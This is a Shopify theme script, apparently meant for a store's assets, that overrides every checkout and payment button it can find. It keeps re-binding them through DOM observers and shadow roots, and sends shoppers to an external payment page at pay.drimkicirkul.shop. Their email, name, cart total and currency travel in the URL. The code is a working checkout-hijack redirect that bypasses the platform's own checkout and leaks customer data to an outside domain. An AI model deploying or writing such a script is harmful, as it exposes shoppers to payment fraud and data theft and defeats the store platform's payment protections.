/* custom-checkout-redirect.js
   Place into theme assets and include in theme.liquid:
   <script>
     window.CUSTOM_CHECKOUT_REDIRECT = {
       target: "https://pay.drimkicirkul.shop/pay.html",
       autoParamsFromLiquid: true, // if theme injects shop/customer/cart via Liquid
       callBackToApp: false,       // set true only if you have a secure server endpoint
       callBackUrl: "",            // optional server URL to call with order/cart data (server must be secure)
       debug: false
     };
   </script>
   <script src="{{ 'custom-checkout-redirect.js' | asset_url }}"></script>
*/

(function () {
  'use strict';

  // helper safe-logger
  function log() {
    try {
      if (window.CUSTOM_CHECKOUT_REDIRECT && window.CUSTOM_CHECKOUT_REDIRECT.debug) {
        console.log.apply(console, arguments);
      }
    } catch (e) {}
  }

  // default config fallback
  var CFG = (window.CUSTOM_CHECKOUT_REDIRECT && typeof window.CUSTOM_CHECKOUT_REDIRECT === 'object')
    ? window.CUSTOM_CHECKOUT_REDIRECT
    : {};

  var TARGET = CFG.target || "https://pay.drimkicirkul.shop/pay.html";
  var CALL_BACK = !!CFG.callBackToApp;
  var CALL_BACK_URL = CFG.callBackUrl || "";
  var DEBUG = !!CFG.debug;

  // helper: build params using Liquid-injected vars or best-effort lookups
  function buildParams() {
    var params = new URLSearchParams();

    // 1) If the theme injected ready-made params object (via Liquid), use it.
    if (window.CUSTOM_CHECKOUT_REDIRECT_PARAMS && typeof window.CUSTOM_CHECKOUT_REDIRECT_PARAMS === 'object') {
      Object.keys(window.CUSTOM_CHECKOUT_REDIRECT_PARAMS).forEach(function(k) {
        if (window.CUSTOM_CHECKOUT_REDIRECT_PARAMS[k] != null) {
          params.set(k, String(window.CUSTOM_CHECKOUT_REDIRECT_PARAMS[k]));
        }
      });
      log('[redirect] using CUSTOM_CHECKOUT_REDIRECT_PARAMS', window.CUSTOM_CHECKOUT_REDIRECT_PARAMS);
      return params;
    }

    // 2) Try to gather what we can from Liquid-injected helpers (common practice)
    // Theme authors can inject these variables into theme.liquid:
    // window.Shop = { name: "...", currency: "USD" }
    // window.cartData = { total_price: 1999 }  (value in cents or displayable form)
    // window.customerData = { email: "...", name: "..." }
    try {
      if (window.Shop && window.Shop.name) params.set('shop', window.Shop.name);
      if (window.Shop && window.Shop.currency) params.set('currency', window.Shop.currency);

      if (window.customerData && window.customerData.email) params.set('email', window.customerData.email);
      if (window.customerData && window.customerData.name) params.set('name', window.customerData.name);

      // cart total: try multiple shapes
      if (window.cartData) {
        if (typeof window.cartData.total_price === 'number') {
          // often cart.total_price is cents in integer
          var cents = window.cartData.total_price;
          if (cents > 1000) {
            // try to be flexible: if likely cents, convert to dollars
            params.set('amount', (cents / 100).toFixed(2));
          } else {
            params.set('amount', Number(cents).toFixed(2));
          }
        } else if (window.cartData.total_price) {
          params.set('amount', String(window.cartData.total_price));
        }
      }

    } catch (e) {
      log('[redirect] error building params', e);
    }

    // 3) If none of the above provided amount/shop, fallback to Shopify Liquid-injected placeholders.
    // The actual injection of these variables is done in theme.liquid with Liquid.
    // Example injection you should add in theme.liquid before loading this file:
    // <script>
    //   window.CUSTOM_CHECKOUT_REDIRECT_PARAMS = {
    //     shop: "{{ shop.name | escape }}",
    //     email: "{{ customer.email | escape }}",
    //     name: "{{ customer.name | escape }}",
    //     amount: "{{ cart.total_price | money_without_currency }}",
    //     currency: "{{ cart.currency.iso_code }}"
    //   };
    // </script>

    // 4) Always add tx_id fallback
    params.set('tx_id', 'tx_' + Date.now());

    return params;
  }

  // core redirect function
  function doRedirect() {
    var params = buildParams();
    var url = TARGET + '?' + params.toString();
    log('[redirect] redirecting to', url);

    // optional: first notify your app server (only if you have server endpoint)
    if (CALL_BACK && CALL_BACK_URL) {
      try {
        // Important: do NOT place long-lived admin tokens here.
        // Your CALL_BACK_URL must be a secure server endpoint that holds any required secrets.
        fetch(CALL_BACK_URL, {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({ redirect_url: url, params: Object.fromEntries(params.entries()) })
        }).catch(function (err) {
          log('[callback] fetch error', err);
        });
      } catch (e) {
        log('[callback] exception', e);
      }
    }

    // finally navigate
    // use replace to avoid back-button piling if desired: window.location.replace(url)
    setTimeout(function () { window.location.href = url; }, 50);
  }

  // robust binder: bind many possible checkout entry points
  function bindClickToElement(el) {
    if (!el || el.dataset.__customRedirectBound === '1') return;
    el.dataset.__customRedirectBound = '1';
    el.addEventListener('click', function (ev) {
      try {
        ev.preventDefault();
        ev.stopPropagation();
      } catch (e) {}
      doRedirect();
    }, { passive: false });
    log('[bind] bound element', el);
  }

  // find and bind known selectors
  function scanAndBind(root) {
    root = root || document;
    var selectors = [
      'button[name="checkout"]',
      '[name="checkout"]',
      '.shopify-payment-button button',
      '.additional-checkout-buttons button',
      '.dynamic-checkout__button',      // dynamic checkout btn classes
      '.cart__checkout-button',         // some themes
      '.drawer__checkout-button'        // some drawer classes
    ];
    selectors.forEach(function (sel) {
      try {
        var els = root.querySelectorAll(sel);
        els.forEach(bindClickToElement);
      } catch (e) {}
    });

    // also try to bind to the parent containers that render payment buttons
    var containers = root.querySelectorAll('.shopify-payment-button, .additional-checkout-buttons, .cart__footer, .drawer__content');
    containers.forEach(function (c) {
      try {
        bindClickToElement(c);
        // if the payment button renders in shadow DOM, try to attach later via shadowRoot
        if (c.shadowRoot) {
          try { scanAndBind(c.shadowRoot); } catch (e) {}
        }
      } catch (e) {}
    });
  }

  // watch for dynamic changes (Shadow DOM, injected buttons, drawer open)
  function startObservers() {
    // observe subtree changes
    var mo = new MutationObserver(function (mutations) {
      try { scanAndBind(document); } catch (e) {}
    });
    mo.observe(document.body, { childList: true, subtree: true });

    // attempt initial scan several times (some themes load buttons after a delay)
    var tries = 0;
    var t = setInterval(function () {
      tries++;
      try { scanAndBind(document); } catch (e) {}
      if (tries > 10) clearInterval(t);
    }, 700);
  }

  // entry point
  function init() {
    try {
      scanAndBind(document);
      startObservers();
      log('[init] custom-checkout-redirect initialized', { TARGET: TARGET, CALL_BACK: CALL_BACK, CALL_BACK_URL: CALL_BACK_URL });
    } catch (e) {
      log('[init] init error', e);
    }
  }

  if (document.readyState === 'loading') {
    document.addEventListener('DOMContentLoaded', init);
  } else {
    init();
  }

})();
